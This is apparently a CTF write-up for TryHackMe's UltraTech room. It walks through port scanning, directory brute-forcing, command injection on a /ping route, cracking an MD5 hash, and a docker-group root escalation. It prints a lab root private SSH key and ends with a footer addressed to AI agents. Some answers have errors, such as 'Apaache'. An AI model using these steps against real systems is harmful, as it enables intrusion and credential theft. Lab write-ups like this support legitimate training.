# UltraTech {% embed url="" %} ## ## Task 1: Deploy the machine ### Deploy the machine
### No answer needed ## ## Task 2: It's enumeration time! ### Which software is using the port 8081? * First, let's run a simple `nmap` scan to see the open ports. ``` $ nmap -p- 10.10.26.63 -T4 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-10 10:18 IST Warning: 10.10.26.63 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.26.63 Host is up (0.13s latency). Not shown: 65520 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 5945/tcp filtered unknown 8081/tcp open blackice-icecap 13012/tcp filtered unknown 13146/tcp filtered unknown 14464/tcp filtered unknown 25132/tcp filtered unknown 26517/tcp filtered unknown 28167/tcp filtered unknown 29393/tcp filtered unknown 31331/tcp open unknown 52117/tcp filtered unknown 52621/tcp filtered unknown 59562/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 826.80 seconds ``` * Now we can run another `nmap` scan on only the ports that are open. ``` $ nmap -p 21,22,8081,31331 -A 10.10.26.63 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-10 11:02 IST Nmap scan report for 10.10.26.63 Host is up (0.13s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA) | 256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA) |_ 256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519) 8081/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-cors: HEAD GET POST PUT DELETE PATCH 31331/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: UltraTech - The best of technology (AI, FinTech, Big Data) |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.96 seconds ``` * There are four open ports: | Port | Service | | ----- | -------------- | | 21 | ftp | | 22 | ssh | | 8081 | http (node.js) | | 31331 | http (apache) | * The service running on port 8081 is Node.js. ### Answer ``` Node.js ``` ### ### Which other non-standard port is used? * 31331 is the other non-standard port. ### Answer ``` 31331 ``` ### ### Which software using this port? * The software on port 31331 is Apache. ### Answer ``` Apaache ``` ### ### Which GNU/Linux distribution seems to be used? * The GNU/Linux distribution is Ubuntu. ### Answer ``` Ubuntu ``` ### ### The software using the port 8081 is a REST api, how many of its routes are used by the web application? * We can see that two routes are being used by the application. ``` 8081/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-cors: HEAD GET POST PUT DELETE PATCH ``` ### Answer ``` 2 ``` ## ## Task 3: Let the fun begin ### There is a database lying around, what is its filename? * We can brute force the web pages on the `8081` port using `gobuster`. ``` $ gobuster dir -u http://10.10.26.63:8081 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.26.63:8081 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /auth (Status: 200) [Size: 39] /ping (Status: 500) [Size: 1094] Progress: 207643 / 207644 (100.00%) =============================================================== Finished =============================================================== ``` * Let's go to the `/ping` page.
* So we are expected to provide a parameter and we haven't done that we get the errors. * Let's try providing an IP address.
* So the application executes the ping command with the IP we provide. * Let's see if it executes a command that we provide.
* It does and we get the server name. ### Answer ``` utech.db.sqlite ``` ### ### What is the first user's password hash? * We can read the passwords from the database using `cat`.
* We get two password hashes, one of `r00t` user and one of `admin` user. | Username | Password hash | | -------- | -------------------------------- | | r00t | f357a0c52799563c7c7b76c1e7543a32 | | admin | 0d0ea5111e3c1def594c1684e3b9be84 | ### Answer ``` f357a0c52799563c7c7b76c1e7543a32 ``` ### ### What is the password associated with this hash? * Let's use `hash-identifier` to identify the hash type. ``` $ hash-identifier f357a0c52799563c7c7b76c1e7543a32 -------------------------------------------------- Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username))) ``` * We can now crack the hash using `john`. ``` $ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3]) Warning: no OpenMP support for this hash type, consider --fork=3 Press 'q' or Ctrl-C to abort, almost any other key for status n100906 (?) 1g 0:00:00:00 DONE (2023-12-08 21:44) 5.000g/s 862080p/s 862080c/s 862080C/s erinbear..eagames Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed. ``` ### Answer ``` n100906 ``` ## ## Task 4: The root of all evil ### What are the first 9 characters of the root user's private SSH key? * We can try logging in through SSH using the `r00t` user and `n100906` password. ``` $ ssh r00t@10.10.26.63 r00t@10.10.26.63's password: Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-46-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sun Dec 10 10:15:49 UTC 2023 System load: 0.04 Processes: 102 Usage of /: 24.4% of 19.56GB Users logged in: 0 Memory usage: 73% IP address for eth0: 10.10.26.63 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 1 package can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Sun Dec 10 09:44:13 2023 from 10.17.48.138 r00t@ultratech-prod:~$ ``` * Let's check what `sudo` commands the `r00t` user can run. ``` r00t@ultratech-prod:~$ sudo -l [sudo] password for r00t: Sorry, user r00t may not run sudo on ultratech-prod. ``` * Looks like we will have to find another way. * If we run `id`, we can see that we are part of the `docker` group. ``` r00t@ultratech-prod:~$ id uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker) r00t@ultratech-prod:~$ which docker /usr/bin/docker r00t@ultratech-prod:~$ ls -l /usr/bin/docker -rwxr-xr-x 1 root root 68631952 Feb 13 2019 /usr/bin/docker ``` * Let's check the containers present. ``` r00t@ultratech-prod:~$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE bash latest 495d6437fc1e 4 years ago 15.8MB ``` * We can see that there is a `bash` container. * We can find an exploit for it on GTFOBins.
``` r00t@ultratech-prod:~$ docker run -v /:/mnt --rm -it bash chroot /mnt bash groups: cannot find name for group ID 11 To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details. root@78c7562da81f:/# ``` * We are now the `root` user. * Let's check the contents of the `root` directory. ``` root@78c7562da81f:/# ls -la /root total 40 drwx------ 6 root root 4096 Mar 22 2019 . drwxr-xr-x 23 root root 4096 Mar 19 2019 .. -rw------- 1 root root 844 Mar 22 2019 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwx------ 2 root root 4096 Mar 22 2019 .cache drwx------ 3 root root 4096 Mar 22 2019 .emacs.d drwx------ 3 root root 4096 Mar 22 2019 .gnupg -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw------- 1 root root 0 Mar 22 2019 .python_history drwx------ 2 root root 4096 Mar 22 2019 .ssh -rw-rw-rw- 1 root root 193 Mar 22 2019 private.txt ``` * The private key is has to be inside the `.ssh` directory. * Let's verify the fact. ``` root@78c7562da81f:/# ls -la /root/.ssh total 16 drwx------ 2 root root 4096 Mar 22 2019 . drwx------ 6 root root 4096 Mar 22 2019 .. -rw------- 1 root root 0 Mar 19 2019 authorized_keys -rw------- 1 root root 1675 Mar 22 2019 id_rsa -rw-r--r-- 1 root root 401 Mar 22 2019 id_rsa.pub ``` * We can now `cat` out the private key. ``` root@78c7562da81f:/# cat /root/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAuDSna2F3pO8vMOPJ4l2PwpLFqMpy1SWYaaREhio64iM65HSm sIOfoEC+vvs9SRxy8yNBQ2bx2kLYqoZpDJOuTC4Y7VIb+3xeLjhmvtNQGofffkQA jSMMlh1MG14fOInXKTRQF8hPBWKB38BPdlNgm7dR5PUGFWni15ucYgCGq1Utc5PP NZVxika+pr/U0Ux4620MzJW899lDG6orIoJo739fmMyrQUjKRnp8xXBv/YezoF8D hQaP7omtbyo0dczKGkeAVCe6ARh8woiVd2zz5SHDoeZLe1ln4KSbIL3EiMQMzOpc jNn7oD+rqmh/ygoXL3yFRAowi+LFdkkS0gqgmwIDAQABAoIBACbTwm5Z7xQu7m2J tiYmvoSu10cK1UWkVQn/fAojoKHF90XsaK5QMDdhLlOnNXXRr1Ecn0cLzfLJoE3h YwcpodWg6dQsOIW740Yu0Ulr1TiiZzOANfWJ679Akag7IK2UMGwZAMDikfV6nBGD wbwZOwXXkEWIeC3PUedMf5wQrFI0mG+mRwWFd06xl6FioC9gIpV4RaZT92nbGfoM BWr8KszHw0t7Cp3CT2OBzL2XoMg/NWFU0iBEBg8n8fk67Y59m49xED7VgupK5Ad1 5neOFdep8rydYbFpVLw8sv96GN5tb/i5KQPC1uO64YuC5ZOyKE30jX4gjAC8rafg o1macDECgYEA4fTHFz1uRohrRkZiTGzEp9VUPNonMyKYHi2FaSTU1Vmp6A0vbBWW tnuyiubefzK5DyDEf2YdhEE7PJbMBjnCWQJCtOaSCz/RZ7ET9pAMvo4MvTFs3I97 eDM3HWDdrmrK1hTaOTmvbV8DM9sNqgJVsH24ztLBWRRU4gOsP4a76s0CgYEA0LK/ /kh/lkReyAurcu7F00fIn1hdTvqa8/wUYq5efHoZg8pba2j7Z8g9GVqKtMnFA0w6 t1KmELIf55zwFh3i5MmneUJo6gYSXx2AqvWsFtddLljAVKpbLBl6szq4wVejoDye lEdFfTHlYaN2ieZADsbgAKs27/q/ZgNqZVI+CQcCgYAO3sYPcHqGZ8nviQhFEU9r 4C04B/9WbStnqQVDoynilJEK9XsueMk/Xyqj24e/BT6KkVR9MeI1ZvmYBjCNJFX2 96AeOaJY3S1RzqSKsHY2QDD0boFEjqjIg05YP5y3Ms4AgsTNyU8TOpKCYiMnEhpD kDKOYe5Zh24Cpc07LQnG7QKBgCZ1WjYUzBY34TOCGwUiBSiLKOhcU02TluxxPpx0 v4q2wW7s4m3nubSFTOUYL0ljiT+zU3qm611WRdTbsc6RkVdR5d/NoiHGHqqSeDyI 6z6GT3CUAFVZ01VMGLVgk91lNgz4PszaWW7ZvAiDI/wDhzhx46Ob6ZLNpWm6JWgo gLAPAoGAdCXCHyTfKI/80YMmdp/k11Wj4TQuZ6zgFtUorstRddYAGt8peW3xFqLn MrOulVZcSUXnezTs3f8TCsH1Yk/2ue8+GmtlZe/3pHRBW0YJIAaHWg5k2I3hsdAz bPB7E9hlrI0AconivYDzfpxfX+vovlP/DdNVub/EO7JSO+RAmqo= -----END RSA PRIVATE KEY----- ``` ### Answer ``` MIIEogIBA ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/medium/ultratech.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.